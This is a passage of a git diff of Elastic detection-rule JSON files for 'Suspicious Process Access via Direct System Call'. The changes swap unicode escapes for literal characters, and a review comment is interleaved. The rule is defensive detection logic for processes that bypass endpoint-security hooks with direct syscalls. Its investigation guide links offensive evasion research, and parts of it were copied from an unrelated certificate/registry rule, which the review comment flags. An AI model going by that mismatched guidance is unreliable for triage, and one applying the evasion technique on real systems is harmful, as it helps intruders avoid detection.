 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/2dd480be-1263-4d9c-8672-172928f6789a_208.json b/packages/security_detection_engine/kibana/security_rule/2dd480be-1263-4d9c-8672-172928f6789a_208.json
index 80272cc3264..f8fee309f4e 100644
--- a/packages/security_detection_engine/kibana/security_rule/2dd480be-1263-4d9c-8672-172928f6789a_208.json
+++ b/packages/security_detection_engine/kibana/security_rule/2dd480be-1263-4d9c-8672-172928f6789a_208.json
@@ -12,8 +12,8 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Process Access via Direct System Call", - "note": "## Triage and analysis\n\n### Investigating Suspicious Process Access via Direct System Call\n\nEndpoint security solutions usually hook userland Windows APIs in order to decide if the code that is being executed is malicious or not. It's possible to bypass hooked functions by writing malicious functions that call syscalls directly.\n\nMore context and technical details can be found in this [research blog](https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/).\n\nThis rule identifies suspicious process access events from an unknown memory region. Attackers can use direct system calls to bypass security solutions that rely on hooks.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, 
start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This detection may be triggered by certain applications that install root certificates for the purpose of inspecting SSL traffic. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove the malicious certificate from the root certificate store.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", - "query": "process where host.os.type == \"windows\" and event.code == \"10\" and\n length(winlog.event_data.CallTrace) \u003e 0 and\n\n /* Sysmon CallTrace starting with unknown memory module instead of ntdll which host Windows NT Syscalls */\n not winlog.event_data.CallTrace :\n (\"?:\\\\WINDOWS\\\\SYSTEM32\\\\ntdll.dll*\",\n \"?:\\\\WINDOWS\\\\SysWOW64\\\\ntdll.dll*\",\n \"?:\\\\Windows\\\\System32\\\\wow64cpu.dll*\",\n \"?:\\\\WINDOWS\\\\System32\\\\wow64win.dll*\",\n \"?:\\\\Windows\\\\System32\\\\win32u.dll*\") and\n\n not winlog.event_data.TargetImage :\n (\"?:\\\\Program Files (x86)\\\\Malwarebytes Anti-Exploit\\\\mbae-svc.exe\",\n \"?:\\\\Program Files\\\\Cisco\\\\AMP\\\\*\\\\sfc.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\*\\\\msedgewebview2.exe\",\n \"?:\\\\Program Files\\\\Adobe\\\\Acrobat DC\\\\Acrobat\\\\*\\\\AcroCEF.exe\") and\n\n not (process.executable : (\"?:\\\\Program Files\\\\Adobe\\\\Acrobat DC\\\\Acrobat\\\\Acrobat.exe\",\n \"?:\\\\Program Files (x86)\\\\World of Warcraft\\\\_classic_\\\\WowClassic.exe\") and\n not winlog.event_data.TargetImage : \"?:\\\\WINDOWS\\\\system32\\\\lsass.exe\")\n", + "note": "## Triage and analysis\n\n### Investigating Suspicious Process Access via Direct System Call\n\nEndpoint security solutions usually hook userland Windows APIs in order to decide if the code that is being executed is malicious or not. 
It's possible to bypass hooked functions by writing malicious functions that call syscalls directly.\n\nMore context and technical details can be found in this [research blog](https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/).\n\nThis rule identifies suspicious process access events from an unknown memory region. Attackers can use direct system calls to bypass security solutions that rely on hooks.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or 
created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This detection may be triggered by certain applications that install root certificates for the purpose of inspecting SSL traffic. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove the malicious certificate from the root certificate store.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "query": "process where host.os.type == \"windows\" and event.code == \"10\" and\n length(winlog.event_data.CallTrace) > 0 and\n\n /* Sysmon CallTrace starting with unknown memory module instead of ntdll which host Windows NT Syscalls */\n not winlog.event_data.CallTrace :\n (\"?:\\\\WINDOWS\\\\SYSTEM32\\\\ntdll.dll*\",\n \"?:\\\\WINDOWS\\\\SysWOW64\\\\ntdll.dll*\",\n \"?:\\\\Windows\\\\System32\\\\wow64cpu.dll*\",\n \"?:\\\\WINDOWS\\\\System32\\\\wow64win.dll*\",\n \"?:\\\\Windows\\\\System32\\\\win32u.dll*\") and\n\n not winlog.event_data.TargetImage :\n (\"?:\\\\Program Files (x86)\\\\Malwarebytes Anti-Exploit\\\\mbae-svc.exe\",\n \"?:\\\\Program Files\\\\Cisco\\\\AMP\\\\*\\\\sfc.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\*\\\\msedgewebview2.exe\",\n \"?:\\\\Program Files\\\\Adobe\\\\Acrobat DC\\\\Acrobat\\\\*\\\\AcroCEF.exe\") and\n\n not (process.executable : (\"?:\\\\Program Files\\\\Adobe\\\\Acrobat DC\\\\Acrobat\\\\Acrobat.exe\",\n \"?:\\\\Program Files (x86)\\\\World of Warcraft\\\\_classic_\\\\WowClassic.exe\") and\n not winlog.event_data.TargetImage : \"?:\\\\WINDOWS\\\\system32\\\\lsass.exe\")\n", "references": [ "https://twitter.com/SBousseaden/status/1278013896440324096", "https://www.ired.team/offensive-security/defense-evasion/using-syscalls-directly-from-visual-studio-to-bypass-avs-edrs" 
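Review bot: The `note` field on the new side still carries investigation-guide text that belongs to a different rule: the False positive analysis bullet talks about applications that install root certificates for SSL inspection, the remediation list says `Remove the malicious certificate from the root certificate store`, and the compromised-accounts step looks for 4624 logons "after the registry modification" — none of which matches a Sysmon event 10 process-access alert whose CallTrace does not begin in ntdll. A rule-specific false-positive bullet would reflect what the query already encodes in its exclusions, e.g. `- Security products, anti-cheat components and embedded browser frameworks (see the TargetImage and process.executable exclusions in the query) may invoke NT syscalls from their own modules; known-good pairs can be added as exceptions.`, with the certificate bullet dropped and "after the registry modification" changed to "after the process access event". The same text recurs in the equivalent hunk of `2dd480be-1263-4d9c-8672-172928f6789a_209.json` and in the `_210.json` hunk that begins near the end of this chunk and runs past it. Since these files appear to be versioned snapshots, the correction presumably belongs in the rule's upstream source and a new rule version rather than in these files.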
@@ -53,7 +53,7 @@
 ],
 "risk_score": 73,
 "rule_id": "2dd480be-1263-4d9c-8672-172928f6789a",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -65,7 +65,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/2dd480be-1263-4d9c-8672-172928f6789a_209.json b/packages/security_detection_engine/kibana/security_rule/2dd480be-1263-4d9c-8672-172928f6789a_209.json
index 5c9090ca04d..a8c664cb60e 100644
--- a/packages/security_detection_engine/kibana/security_rule/2dd480be-1263-4d9c-8672-172928f6789a_209.json
+++ b/packages/security_detection_engine/kibana/security_rule/2dd480be-1263-4d9c-8672-172928f6789a_209.json
@@ -12,8 +12,8 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Process Access via Direct System Call", - "note": "## Triage and analysis\n\n### Investigating Suspicious Process Access via Direct System Call\n\nEndpoint security solutions usually hook userland Windows APIs in order to decide if the code that is being executed is malicious or not. It's possible to bypass hooked functions by writing malicious functions that call syscalls directly.\n\nMore context and technical details can be found in this [research blog](https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/).\n\nThis rule identifies suspicious process access events from an unknown memory region. Attackers can use direct system calls to bypass security solutions that rely on hooks.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, 
start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This detection may be triggered by certain applications that install root certificates for the purpose of inspecting SSL traffic. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove the malicious certificate from the root certificate store.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", - "query": "process where host.os.type == \"windows\" and event.code == \"10\" and\n length(winlog.event_data.CallTrace) \u003e 0 and\n\n /* Sysmon CallTrace starting with unknown memory module instead of ntdll which host Windows NT Syscalls */\n not winlog.event_data.CallTrace :\n (\"?:\\\\WINDOWS\\\\SYSTEM32\\\\ntdll.dll*\",\n \"?:\\\\WINDOWS\\\\SysWOW64\\\\ntdll.dll*\",\n \"?:\\\\Windows\\\\System32\\\\wow64cpu.dll*\",\n \"?:\\\\WINDOWS\\\\System32\\\\wow64win.dll*\",\n \"?:\\\\Windows\\\\System32\\\\win32u.dll*\") and\n\n not winlog.event_data.TargetImage :\n (\"?:\\\\Program Files (x86)\\\\Malwarebytes Anti-Exploit\\\\mbae-svc.exe\",\n \"?:\\\\Program Files\\\\Cisco\\\\AMP\\\\*\\\\sfc.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\*\\\\msedgewebview2.exe\",\n \"?:\\\\Program Files\\\\Adobe\\\\Acrobat DC\\\\Acrobat\\\\*\\\\AcroCEF.exe\") and\n\n not (process.executable : (\"?:\\\\Program Files\\\\Adobe\\\\Acrobat DC\\\\Acrobat\\\\Acrobat.exe\",\n \"?:\\\\Program Files (x86)\\\\World of Warcraft\\\\_classic_\\\\WowClassic.exe\") and\n not winlog.event_data.TargetImage : \"?:\\\\WINDOWS\\\\system32\\\\lsass.exe\")\n", + "note": "## Triage and analysis\n\n### Investigating Suspicious Process Access via Direct System Call\n\nEndpoint security solutions usually hook userland Windows APIs in order to decide if the code that is being executed is malicious or not. 
It's possible to bypass hooked functions by writing malicious functions that call syscalls directly.\n\nMore context and technical details can be found in this [research blog](https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/).\n\nThis rule identifies suspicious process access events from an unknown memory region. Attackers can use direct system calls to bypass security solutions that rely on hooks.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or 
created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This detection may be triggered by certain applications that install root certificates for the purpose of inspecting SSL traffic. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove the malicious certificate from the root certificate store.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "query": "process where host.os.type == \"windows\" and event.code == \"10\" and\n length(winlog.event_data.CallTrace) > 0 and\n\n /* Sysmon CallTrace starting with unknown memory module instead of ntdll which host Windows NT Syscalls */\n not winlog.event_data.CallTrace :\n (\"?:\\\\WINDOWS\\\\SYSTEM32\\\\ntdll.dll*\",\n \"?:\\\\WINDOWS\\\\SysWOW64\\\\ntdll.dll*\",\n \"?:\\\\Windows\\\\System32\\\\wow64cpu.dll*\",\n \"?:\\\\WINDOWS\\\\System32\\\\wow64win.dll*\",\n \"?:\\\\Windows\\\\System32\\\\win32u.dll*\") and\n\n not winlog.event_data.TargetImage :\n (\"?:\\\\Program Files (x86)\\\\Malwarebytes Anti-Exploit\\\\mbae-svc.exe\",\n \"?:\\\\Program Files\\\\Cisco\\\\AMP\\\\*\\\\sfc.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\*\\\\msedgewebview2.exe\",\n \"?:\\\\Program Files\\\\Adobe\\\\Acrobat DC\\\\Acrobat\\\\*\\\\AcroCEF.exe\") and\n\n not (process.executable : (\"?:\\\\Program Files\\\\Adobe\\\\Acrobat DC\\\\Acrobat\\\\Acrobat.exe\",\n \"?:\\\\Program Files (x86)\\\\World of Warcraft\\\\_classic_\\\\WowClassic.exe\") and\n not winlog.event_data.TargetImage : \"?:\\\\WINDOWS\\\\system32\\\\lsass.exe\")\n", "references": [ "https://twitter.com/SBousseaden/status/1278013896440324096", "https://www.ired.team/offensive-security/defense-evasion/using-syscalls-directly-from-visual-studio-to-bypass-avs-edrs" 
@@ -53,7 +53,7 @@
 ],
 "risk_score": 73,
 "rule_id": "2dd480be-1263-4d9c-8672-172928f6789a",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -66,7 +66,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
@@ -81,7 +81,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/2dd480be-1263-4d9c-8672-172928f6789a_210.json b/packages/security_detection_engine/kibana/security_rule/2dd480be-1263-4d9c-8672-172928f6789a_210.json
index e0c3e1520b5..e8991cc52cf 100644
--- a/packages/security_detection_engine/kibana/security_rule/2dd480be-1263-4d9c-8672-172928f6789a_210.json
+++ b/packages/security_detection_engine/kibana/security_rule/2dd480be-1263-4d9c-8672-172928f6789a_210.json
@@ -12,8 +12,8 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Suspicious Process Access via Direct System Call",
- "note": "## Triage and analysis\n\n### Investigating Suspicious Process Access via Direct System Call\n\nEndpoint security solutions usually hook userland Windows APIs in order to decide if the code that is being executed is malicious or not. It's possible to bypass hooked functions by writing malicious functions that call syscalls directly.\n\nMore context and technical details can be found in this [research blog](https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/).\n\nThis rule identifies suspicious process access events from an unknown memory region. Attackers can use direct system calls to bypass security solutions that rely on hooks.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, 
start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This detection may be triggered by certain applications that install root certificates for the purpose of inspecting SSL traffic. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove the malicious certificate from the root certificate store.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n",
